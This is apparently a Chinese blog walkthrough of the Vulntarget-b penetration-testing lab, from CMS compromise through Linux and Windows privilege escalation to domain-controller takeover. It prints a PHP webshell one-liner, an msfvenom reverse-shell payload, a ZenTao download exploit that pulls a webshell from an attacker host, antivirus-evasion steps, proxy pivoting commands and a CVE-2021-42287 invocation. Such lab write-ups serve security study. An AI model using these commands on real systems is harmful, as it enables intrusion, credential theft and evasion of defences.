Vulntarget-b-wp

Vulntarget-b

环境配置

centos7

用户 密码
root root
vulntarget root

宝塔Linux面板http://192.168.0.104:8888/045b2769

username password
rpngwb3l b0db10cc

*image-20221124100123403*

我这不想改kali的 就直接改他的外网IP了

vi /etc/sysconfig/network-scripts/ifcfg-ens33

image-20221124172601316

域控2016

账号信息
域:vulntarget.com

账号 密码
administrator qwe!@#123(原始为:Admin@123)
win101 admin#123

image-20221124152009846

域成员win10

账号信息

本地账号:win10 密码:win10#123
管理员:administrator 密码:admin@123
域成员:vulntarget\win101 密码:admin#123
web后台::admin 密码:Admin123

image-20221124151910306

网络

centos7 192.168.130.104 10.0.20.30
win10 10.0.20.66 10.0.10.99
域控2016 / 10.0.10.100
kali 192.168.130.5 /

实战

信息收集

得到外网IP开始扫一下端口服务,发现了登录面板

image-20221124153717125

果然8888端口上的宝塔

image-20221124154016399

搜索一波找到这个cms默认的登录点,试了几次发现当存在这个用户的时候,密码错了会报用户不存在,但不会重新刷新验证码。

image-20221124182520498

直接抓包丢到burp里面跑一下常用登录密码就出来了

image-20221124182502667

反弹shell

之后查了以下这个cms的漏洞,有一个可以利用的点

image-20221124174754317

登上后台去搜插件,就是这个可以动后台文件准没错

image-20221124172657047

下载好了之后点配置然后就会要设置一下

image-20221124172812610

之后再输一次密码就可以进到下面的页面

image-20221124172914272

进来第一眼就是想利用404来反弹shell但是没成功,后面随便在一个文件php里面插入一句话可以进来

image-20221124174736903

上线msf

但接着发现命令执行不了会返回,这里就利用蚁剑的插件来绕过

image-20221124175618668

上传了🐎子,赋权了之后就可以上线了

msfvenom -p linux/x64/meterpreter/reverse_tcp  lhost=192.168.130.5 LPORT=9999 -f elf > bk.elf

image-20221124185941214

Linux提权

创建路由入段,然后查找可提权模块

run post/multi/manage/autoroute
run post/multi/recon/local_exploit_suggester

image-20221124184658667

一路尝试了过来直到第六个的时候发现可以创建一个root权限的用户msf,密码为lawdkrkmobruddu.可以ssh连上去就是root

image-20221124190636742

再用这个账户重新开刚刚那个🐎子,以root上线msf

image-20221124191048355

chesil第一层代理

创建路由入段。使用portscan模块扫一下10.0.20.1这个网段的端口,得到了一个66的机器开了8080端口

run post/multi/manage/autoroute 
use auxiliary/scanner/portscan/tcp

image-20221127221827243

然后本来用msf的代理模块来续上nmap接着扫,但是才一会会就断开了,一点都不稳定

image-20221127223149524

这里用体积小还很稳定的chisel开启socks代理

./chesil_1.7.7_linux_386 server -p 6666 --reverse
./chesil_1.7.7_linux_386 client 192.168.130.104:6666 R:socks

image-20221127231138429

ssh上转发本地流量

ssh -C -f -N -g -L 0.0.0.0:12121:127.0.0.1:1080 msf@192.168.130.104

image-20221127232018280

浏览器上配置好代理

image-20221127232620530

就可以访问到66这台机器了,但是这个页面试了几次就会锁十分钟,真就弱口令硬试出来才能登录

image-20221127232553264

文件上传拿webshell

查看到cms的版本信息

http://10.0.20.66:8080/index.php?mode=getconfig

image-20221212214331225

搜索禅道12.4.2这个版本的历史漏洞

image-20221222161331385

按照复现步骤来就行了,简述一下,写入一句话然后用base64加密马子的下载地址(HTTP必须大写,或者也可以替换成FTP)并在30这台机器上开启web服务确保能够下载到,然后再替换&link=后面的内容为加密过的下载地址访问。但是是出了错,下载不了

echo '<?php @eval(\$_REQUEST['x']); ?>' > 3.php
echo 'HTTP://10.0.20.33:1514/3.php' | base64
python -m SimpleHTTPServer 1514
http://10.0.20.66:8080/index.php/index.php?m=client&f=download&version=1&link=RlRQOjEwLjAuMjAuMzA6NTY1Ni8xLnBocA==

image-20221128000719790

我去win10上看是产生了一个php文件,但是却是空文件。开关防火前没有影响。应该是后端处理下载文件的问题。

image-20221128002110997

试了几次使用哥斯拉base64加密的🐎保存成功了

image-20221212220418623

连上去了,代理的设置和浏览器一样的。发现当前还存在一个10.0.10.0的网段

image-20221212174243121

查看了一下进程发现里面有火绒

image-20221212180536285

pystinger第二层代理

这里因为66这台win10不出网,是个内网的服务器,就使用pystinger通过webshell进行流量转发。用哥斯拉上传proxy.php。能访问到显示UTF-8就没问题了。

image-20221216160953035

哥斯拉和本地kali上面如下执行,当stinger_client显示“socks4a ready 头accept”,就表示信道建立成功

stinger_server.exe 0.0.0.0
./stinger_client-w http://10.0.20.66:8080/data/proxy.php -l 127.0.0.1 -p 60000

image-20221221165756277

免杀过火绒

先生成c格式的payload,然后我这里用的是96368a/Logs404_BypassAV: 木末君的shellcode免杀脚本 (github.com)。生成exe后上传

python v1.3.py dosth.c

image-20221221212634743

在cs上建立新的监听器,由于pystinger的转发将66这台win10 60020的流量映射到了kali的60020端口,故如下:

image-20221221171807584

运行之后就会上线,不过时不时会假死一下,等一会才会执行命令

image-20221221171906844

win10提权

尝试了一下比较新的漏洞没成功

image-20221221174246057

把复制的systeminfo的信息丢到提权辅助网站上看看,试试底下第一个建议的 cve-2021-1732

image-20221221225719057

项目clone下来,然后开vs选Windows 桌面向导。因为readme里面很简略,这里就详细记录一下编译过程,

image-20221221185537924

选桌面应用程序再勾上空项目

image-20221221191702753

添加现有项选择下载的ExploitTest.cpp,注意一下左上角的debug选项

image-20221221191757450

然后按 Alt + F7 打开设置,如下配置即可

image-20221221192004133

image-20221221192057810

image-20221221192147325

最后这里也要修改一下,不然会报错:LNK2019 无法解析的外部符号 _main函数 “int __cdecl invoke_main(void)“中引用了该符号

image-20221221201832744

按F7生成解决方案之后,进C:\Users\用户名\source\repos\项目名\x64\Debug,就可以看到编译好的exe了

image-20221221212149203

但是有概率蓝屏,等他转一会继续就行了

image-20221221204920500

执行几次之后,就会以system权限执行前面上传的🐎子上线

ExploitTest.exe "shell1.exe"

image-20221222150232494

抓一下密码,由于这台机器上没登过管理员的号抓不到,只有这台机器win101这个用户的

image-20221222132426705

去在线网站上接出来得到密码 admin#123

image-20221222132208510

拿下域控

得到66这台机器的账密之后直接上 CVE-2021-42287,拿下域控

pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
proxychains python3 sam_the_admin.py "vulntarget.com/win101:admin#123" -dc-ip 10.0.10.100 -shell

image-20221222145451459

posted @ 2022-12-22 19:23  lockly  阅读(196)  评论(0)    收藏  举报